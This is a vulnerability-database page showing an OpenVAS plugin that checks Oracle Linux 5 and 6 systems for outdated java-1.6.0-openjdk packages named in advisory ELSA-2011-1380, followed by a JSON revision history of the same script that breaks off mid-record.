Search...

Oracle Linux Local Check: ELSA-2011-1380

2015-10-06T00:00:00

ID OPENVAS:1361412562310122071
Type openvas
Reporter Eero Volotinen
Modified 2018-09-28T00:00:00

Description

Oracle Linux Local Security Checks ELSA-2011-1380

                                        
                                            ###############################################################################
# OpenVAS Vulnerability Test
# $Id: ELSA-2011-1380.nasl 11688 2018-09-28 13:36:28Z cfischer $
#
# Oracle Linux Local Check
#
# Authors:
# Eero Volotinen &lt;eero.volotinen@solinor.com&gt;
#
# Copyright:
# Copyright (c) 2015 Eero Volotinen, http://solinor.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.122071");
  script_version("$Revision: 11688 $");
  script_tag(name:"creation_date", value:"2015-10-06 14:12:34 +0300 (Tue, 06 Oct 2015)");
  script_tag(name:"last_modification", value:"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $");
  script_name("Oracle Linux Local Check: ELSA-2011-1380");
  script_tag(name:"insight", value:"ELSA-2011-1380 - java-1.6.0-openjdk security update. Please see the references for more insight.");
  script_tag(name:"solution", value:"Update the affected packages to the latest available version.");
  script_tag(name:"solution_type", value:"VendorFix");
  script_tag(name:"summary", value:"Oracle Linux Local Security Checks ELSA-2011-1380");
  script_xref(name:"URL", value:"http://linux.oracle.com/errata/ELSA-2011-1380.html");
  script_cve_id("CVE-2011-3389", "CVE-2011-3521", "CVE-2011-3544", "CVE-2011-3547", "CVE-2011-3548", "CVE-2011-3551", "CVE-2011-3552", "CVE-2011-3553", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3557", "CVE-2011-3558", "CVE-2011-3560");
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_tag(name:"qod_type", value:"package");
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/oracle_linux", "ssh/login/release", re:"ssh/login/release=OracleLinux(5|6)");
  script_category(ACT_GATHER_INFO);
  script_copyright("Eero Volotinen");
  script_family("Oracle Linux Local Security Checks");

  exit(0);
}

include("revisions-lib.inc");
include("pkg-lib-rpm.inc");

release = rpm_get_ssh_release();
if(!release) exit(0);

res = "";

if(release == "OracleLinux5")
{
  if ((res = isrpmvuln(pkg:"java-1.6.0-openjdk", rpm:"java-1.6.0-openjdk~1.6.0.0~1.23.1.9.10.0.1.el5_7", rls:"OracleLinux5")) != NULL) {
    security_message(data:res);
    exit(0);
  }
  if ((res = isrpmvuln(pkg:"java-1.6.0-openjdk-demo", rpm:"java-1.6.0-openjdk-demo~1.6.0.0~1.23.1.9.10.0.1.el5_7", rls:"OracleLinux5")) != NULL) {
    security_message(data:res);
    exit(0);
  }
  if ((res = isrpmvuln(pkg:"java-1.6.0-openjdk-devel", rpm:"java-1.6.0-openjdk-devel~1.6.0.0~1.23.1.9.10.0.1.el5_7", rls:"OracleLinux5")) != NULL) {
    security_message(data:res);
    exit(0);
  }
  if ((res = isrpmvuln(pkg:"java-1.6.0-openjdk-javadoc", rpm:"java-1.6.0-openjdk-javadoc~1.6.0.0~1.23.1.9.10.0.1.el5_7", rls:"OracleLinux5")) != NULL) {
    security_message(data:res);
    exit(0);
  }
  if ((res = isrpmvuln(pkg:"java-1.6.0-openjdk-src", rpm:"java-1.6.0-openjdk-src~1.6.0.0~1.23.1.9.10.0.1.el5_7", rls:"OracleLinux5")) != NULL) {
    security_message(data:res);
    exit(0);
  }

}
if(release == "OracleLinux6")
{
  if ((res = isrpmvuln(pkg:"java-1.6.0-openjdk", rpm:"java-1.6.0-openjdk~1.6.0.0~1.40.1.9.10.el6_1", rls:"OracleLinux6")) != NULL) {
    security_message(data:res);
    exit(0);
  }
  if ((res = isrpmvuln(pkg:"java-1.6.0-openjdk-demo", rpm:"java-1.6.0-openjdk-demo~1.6.0.0~1.40.1.9.10.el6_1", rls:"OracleLinux6")) != NULL) {
    security_message(data:res);
    exit(0);
  }
  if ((res = isrpmvuln(pkg:"java-1.6.0-openjdk-devel", rpm:"java-1.6.0-openjdk-devel~1.6.0.0~1.40.1.9.10.el6_1", rls:"OracleLinux6")) != NULL) {
    security_message(data:res);
    exit(0);
  }
  if ((res = isrpmvuln(pkg:"java-1.6.0-openjdk-javadoc", rpm:"java-1.6.0-openjdk-javadoc~1.6.0.0~1.40.1.9.10.el6_1", rls:"OracleLinux6")) != NULL) {
    security_message(data:res);
    exit(0);
  }
  if ((res = isrpmvuln(pkg:"java-1.6.0-openjdk-src", rpm:"java-1.6.0-openjdk-src~1.6.0.0~1.40.1.9.10.el6_1", rls:"OracleLinux6")) != NULL) {
    security_message(data:res);
    exit(0);
  }

}
if (__pkg_match) exit(99);
  exit(0);

JSON Vulners Source

Initial Source

{"id": "OPENVAS:1361412562310122071", "bulletinFamily": "scanner", "title": "Oracle Linux Local Check: ELSA-2011-1380", "description": "Oracle Linux Local Security Checks ELSA-2011-1380", "published": "2015-10-06T00:00:00", "modified": "2018-09-28T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122071", "reporter": "Eero Volotinen", "references": ["http://linux.oracle.com/errata/ELSA-2011-1380.html"], "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3558", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3552"], "type": "openvas", "lastseen": "2018-09-28T18:23:51", "history": [{"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3558", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3552"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Oracle Linux Local Security Checks ELSA-2011-1380", "edition": 3, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}}, "hash": "6f2a88265f0e314e0220714fe2931b78771048b88265479ca38fd1d76cc107d0", "hashmap": [{"hash": "08b23d2d7acff95e6d367430d3593874", "key": "href"}, {"hash": "774d0176dfa389c0c71e9e200f95a6ba", "key": "modified"}, {"hash": "705c9c6e3a07fe0b437680078dc3c313", "key": "references"}, {"hash": "8dd9465c1f750ba48cd8167f93b302ce", "key": "pluginID"}, {"hash": "43e62d614cb735876955c04cd73f397d", "key": "sourceData"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "64f508884fcbd4fda1d8563719289c2c", "key": "cvelist"}, {"hash": "e31ed89ab0cbb68ce2c40f17ec1e5483", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "7ed6b2320916c7b97f13bf098c5ce691", "key": "title"}, {"hash": "30c4194c368eb509b76e4c51d5fe867a", "key": "description"}, {"hash": "2996f7d445a5f86070564ef8302482c9", "key": "published"}, {"hash": "bb3dbc0ecae053747a8a163af717a25f", "key": "reporter"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122071", "id": "OPENVAS:1361412562310122071", "lastseen": "2017-07-24T12:52:23", "modified": "2017-07-06T00:00:00", "naslFamily": "Oracle Linux Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310122071", "published": "2015-10-06T00:00:00", "references": ["http://linux.oracle.com/errata/ELSA-2011-1380.html"], "reporter": "Eero Volotinen", "sourceData": "# OpenVAS Vulnerability Test \n# Description: Oracle Linux Local Check \n# $Id: ELSA-2011-1380.nasl 6556 2017-07-06 11:54:54Z cfischer $\n \n# Authors: \n# Eero Volotinen <eero.volotinen@solinor.com> \n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.122071\");\nscript_version(\"$Revision: 6556 $\");\nscript_tag(name:\"creation_date\", value:\"2015-10-06 14:12:34 +0300 (Tue, 06 Oct 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 13:54:54 +0200 (Thu, 06 Jul 2017) $\");\nscript_name(\"Oracle Linux Local Check: ELSA-2011-1380\");\nscript_tag(name: \"insight\", value: \"ELSA-2011-1380 - java-1.6.0-openjdk security update - [1:1.6.0.0-1.40.1.9.10]- Resolves: rhbz#744788- Bumped to IcedTea6 1.9.8-removed font copying Security fixes - S7000600, CVE-2011-3547: InputStream skip() information leak - S7019773, CVE-2011-3548: mutable static AWTKeyStroke.ctor - S7023640, CVE-2011-3551: Java2D TransformHelper integer overflow - S7032417, CVE-2011-3552: excessive default UDP socket limit under SecurityManager - S7046823, CVE-2011-3544: missing SecurityManager checks in scripting engine - S7055902, CVE-2011-3521: IIOP deserialization code execution - S7057857, CVE-2011-3554: insufficient pack200 JAR files uncompress error checks - S7064341, CVE-2011-3389: JSSE - S7070134, CVE-2011-3558: Hotspot unspecified issue - S7077466, CVE-2011-3556: RMI DGC server remote code execution - S7083012, CVE-2011-3557: RMI registry privileged code execution - S7096936, CVE-2011-3560: missing checkSetFactory calls in HttpsURLConnection NetX - PR794: javaws does not work if a Web Start app jar has a Class-Path element in the manifest\"); \nscript_tag(name : \"solution\", value : \"update software\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_tag(name : \"summary\", value : \"Oracle Linux Local Security Checks ELSA-2011-1380\");\nscript_xref(name : \"URL\" , value : \"http://linux.oracle.com/errata/ELSA-2011-1380.html\");\nscript_cve_id(\"CVE-2011-3389\",\"CVE-2011-3521\",\"CVE-2011-3544\",\"CVE-2011-3547\",\"CVE-2011-3548\",\"CVE-2011-3551\",\"CVE-2011-3552\",\"CVE-2011-3553\",\"CVE-2011-3554\",\"CVE-2011-3556\",\"CVE-2011-3557\",\"CVE-2011-3558\",\"CVE-2011-3560\");\nscript_tag(name:\"cvss_base\", value:\"10.0\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\");\nscript_category(ACT_GATHER_INFO);\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Oracle Linux Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\nrelease = get_kb_item(\"ssh/login/release\");\nres = \"\";\nif(release == NULL)\n{\n exit(0);\n}\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.23.1.9.10.0.1.el5_7\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.23.1.9.10.0.1.el5_7\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.23.1.9.10.0.1.el5_7\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.23.1.9.10.0.1.el5_7\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.23.1.9.10.0.1.el5_7\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.40.1.9.10.el6_1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.40.1.9.10.el6_1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.40.1.9.10.el6_1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.40.1.9.10.el6_1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.40.1.9.10.el6_1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n\n}\nif (__pkg_match) exit(99); #Not vulnerable\n exit(0);\n\n", "title": "Oracle Linux Local Check: ELSA-2011-1380", "type": "openvas", "viewCount": 0}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2017-07-24T12:52:23"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3558", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3552"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Oracle Linux Local Security Checks ELSA-2011-1380", "edition": 5, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}}, "hash": "6f2a88265f0e314e0220714fe2931b78771048b88265479ca38fd1d76cc107d0", "hashmap": [{"hash": "08b23d2d7acff95e6d367430d3593874", "key": "href"}, {"hash": "774d0176dfa389c0c71e9e200f95a6ba", "key": "modified"}, {"hash": "705c9c6e3a07fe0b437680078dc3c313", "key": "references"}, {"hash": "8dd9465c1f750ba48cd8167f93b302ce", "key": "pluginID"}, {"hash": "43e62d614cb735876955c04cd73f397d", "key": "sourceData"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "64f508884fcbd4fda1d8563719289c2c", "key": "cvelist"}, {"hash": "e31ed89ab0cbb68ce2c40f17ec1e5483", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "7ed6b2320916c7b97f13bf098c5ce691", "key": "title"}, {"hash": "30c4194c368eb509b76e4c51d5fe867a", "key": "description"}, {"hash": "2996f7d445a5f86070564ef8302482c9", "key": "published"}, {"hash": "bb3dbc0ecae053747a8a163af717a25f", "key": "reporter"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122071", "id": "OPENVAS:1361412562310122071", "lastseen": "2018-09-01T23:49:50", "modified": "2017-07-06T00:00:00", "naslFamily": "Oracle Linux Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310122071", "published": "2015-10-06T00:00:00", "references": ["http://linux.oracle.com/errata/ELSA-2011-1380.html"], "reporter": "Eero Volotinen", "sourceData": "# OpenVAS Vulnerability Test \n# Description: Oracle Linux Local Check \n# $Id: ELSA-2011-1380.nasl 6556 2017-07-06 11:54:54Z cfischer $\n \n# Authors: \n# Eero Volotinen <eero.volotinen@solinor.com> \n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.122071\");\nscript_version(\"$Revision: 6556 $\");\nscript_tag(name:\"creation_date\", value:\"2015-10-06 14:12:34 +0300 (Tue, 06 Oct 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 13:54:54 +0200 (Thu, 06 Jul 2017) $\");\nscript_name(\"Oracle Linux Local Check: ELSA-2011-1380\");\nscript_tag(name: \"insight\", value: \"ELSA-2011-1380 - java-1.6.0-openjdk security update - [1:1.6.0.0-1.40.1.9.10]- Resolves: rhbz#744788- Bumped to IcedTea6 1.9.8-removed font copying Security fixes - S7000600, CVE-2011-3547: InputStream skip() information leak - S7019773, CVE-2011-3548: mutable static AWTKeyStroke.ctor - S7023640, CVE-2011-3551: Java2D TransformHelper integer overflow - S7032417, CVE-2011-3552: excessive default UDP socket limit under SecurityManager - S7046823, CVE-2011-3544: missing SecurityManager checks in scripting engine - S7055902, CVE-2011-3521: IIOP deserialization code execution - S7057857, CVE-2011-3554: insufficient pack200 JAR files uncompress error checks - S7064341, CVE-2011-3389: JSSE - S7070134, CVE-2011-3558: Hotspot unspecified issue - S7077466, CVE-2011-3556: RMI DGC server remote code execution - S7083012, CVE-2011-3557: RMI registry privileged code execution - S7096936, CVE-2011-3560: missing checkSetFactory calls in HttpsURLConnection NetX - PR794: javaws does not work if a Web Start app jar has a Class-Path element in the manifest\"); \nscript_tag(name : \"solution\", value : \"update software\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_tag(name : \"summary\", value : \"Oracle Linux Local Security Checks ELSA-2011-1380\");\nscript_xref(name : \"URL\" , value : \"http://linux.oracle.com/errata/ELSA-2011-1380.html\");\nscript_cve_id(\"CVE-2011-3389\",\"CVE-2011-3521\",\"CVE-2011-3544\",\"CVE-2011-3547\",\"CVE-2011-3548\",\"CVE-2011-3551\",\"CVE-2011-3552\",\"CVE-2011-3553\",\"CVE-2011-3554\",\"CVE-2011-3556\",\"CVE-2011-3557\",\"CVE-2011-3558\",\"CVE-2011-3560\");\nscript_tag(name:\"cvss_base\", value:\"10.0\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\");\nscript_category(ACT_GATHER_INFO);\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Oracle Linux Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\nrelease = get_kb_item(\"ssh/login/release\");\nres = \"\";\nif(release == NULL)\n{\n exit(0);\n}\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.23.1.9.10.0.1.el5_7\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.23.1.9.10.0.1.el5_7\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.23.1.9.10.0.1.el5_7\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.23.1.9.10.0.1.el5_7\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.23.1.9.10.0.1.el5_7\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.40.1.9.10.el6_1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.40.1.9.10.el6_1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.40.1.9.10.el6_1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.40.1.9.10.el6_1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.40.1.9.10.el6_1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n\n}\nif (__pkg_match) exit(99); #Not vulnerable\n exit(0);\n\n", "title": "Oracle Linux Local Check: ELSA-2011-1380", "type": "openvas", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 5, "lastseen": "2018-09-01T23:49:50"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3558", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3552"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Oracle Linux Local Security Checks ELSA-2011-1380", "edition": 4, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}}, "hash": "27744147bc9f88d437b503ce3a717069137e9a8883107d782c89fcacb62dd9d9", "hashmap": [{"hash": "08b23d2d7acff95e6d367430d3593874", "key": "href"}, {"hash": "774d0176dfa389c0c71e9e200f95a6ba", "key": "modified"}, {"hash": "705c9c6e3a07fe0b437680078dc3c313", "key": "references"}, {"hash": "8dd9465c1f750ba48cd8167f93b302ce", "key": "pluginID"}, {"hash": "43e62d614cb735876955c04cd73f397d", "key": "sourceData"}, {"hash": "64f508884fcbd4fda1d8563719289c2c", "key": "cvelist"}, {"hash": "e31ed89ab0cbb68ce2c40f17ec1e5483", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "7ed6b2320916c7b97f13bf098c5ce691", "key": "title"}, {"hash": "30c4194c368eb509b76e4c51d5fe867a", "key": "description"}, {"hash": "2996f7d445a5f86070564ef8302482c9", "key": "published"}, {"hash": "bb3dbc0ecae053747a8a163af717a25f", "key": "reporter"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122071", "id": "OPENVAS:1361412562310122071", "lastseen": "2018-08-30T19:21:58", "modified": "2017-07-06T00:00:00", "naslFamily": "Oracle Linux Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310122071", "published": "2015-10-06T00:00:00", "references": ["http://linux.oracle.com/errata/ELSA-2011-1380.html"], "reporter": "Eero Volotinen", "sourceData": "# OpenVAS Vulnerability Test \n# Description: Oracle Linux Local Check \n# $Id: ELSA-2011-1380.nasl 6556 2017-07-06 11:54:54Z cfischer $\n \n# Authors: \n# Eero Volotinen <eero.volotinen@solinor.com> \n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.122071\");\nscript_version(\"$Revision: 6556 $\");\nscript_tag(name:\"creation_date\", value:\"2015-10-06 14:12:34 +0300 (Tue, 06 Oct 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 13:54:54 +0200 (Thu, 06 Jul 2017) $\");\nscript_name(\"Oracle Linux Local Check: ELSA-2011-1380\");\nscript_tag(name: \"insight\", value: \"ELSA-2011-1380 - java-1.6.0-openjdk security update - [1:1.6.0.0-1.40.1.9.10]- Resolves: rhbz#744788- Bumped to IcedTea6 1.9.8-removed font copying Security fixes - S7000600, CVE-2011-3547: InputStream skip() information leak - S7019773, CVE-2011-3548: mutable static AWTKeyStroke.ctor - S7023640, CVE-2011-3551: Java2D TransformHelper integer overflow - S7032417, CVE-2011-3552: excessive default UDP socket limit under SecurityManager - S7046823, CVE-2011-3544: missing SecurityManager checks in scripting engine - S7055902, CVE-2011-3521: IIOP deserialization code execution - S7057857, CVE-2011-3554: insufficient pack200 JAR files uncompress error checks - S7064341, CVE-2011-3389: JSSE - S7070134, CVE-2011-3558: Hotspot unspecified issue - S7077466, CVE-2011-3556: RMI DGC server remote code execution - S7083012, CVE-2011-3557: RMI registry privileged code execution - S7096936, CVE-2011-3560: missing checkSetFactory calls in HttpsURLConnection NetX - PR794: javaws does not work if a Web Start app jar has a Class-Path element in the manifest\"); \nscript_tag(name : \"solution\", value : \"update software\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_tag(name : \"summary\", value : \"Oracle Linux Local Security Checks ELSA-2011-1380\");\nscript_xref(name : \"URL\" , value : \"http://linux.oracle.com/errata/ELSA-2011-1380.html\");\nscript_cve_id(\"CVE-2011-3389\",\"CVE-2011-3521\",\"CVE-2011-3544\",\"CVE-2011-3547\",\"CVE-2011-3548\",\"CVE-2011-3551\",\"CVE-2011-3552\",\"CVE-2011-3553\",\"CVE-2011-3554\",\"CVE-2011-3556\",\"CVE-2011-3557\",\"CVE-2011-3558\",\"CVE-2011-3560\");\nscript_tag(name:\"cvss_base\", value:\"10.0\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\");\nscript_category(ACT_GATHER_INFO);\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Oracle Linux Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\nrelease = get_kb_item(\"ssh/login/release\");\nres = \"\";\nif(release == NULL)\n{\n exit(0);\n}\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.23.1.9.10.0.1.el5_7\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.23.1.9.10.0.1.el5_7\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", 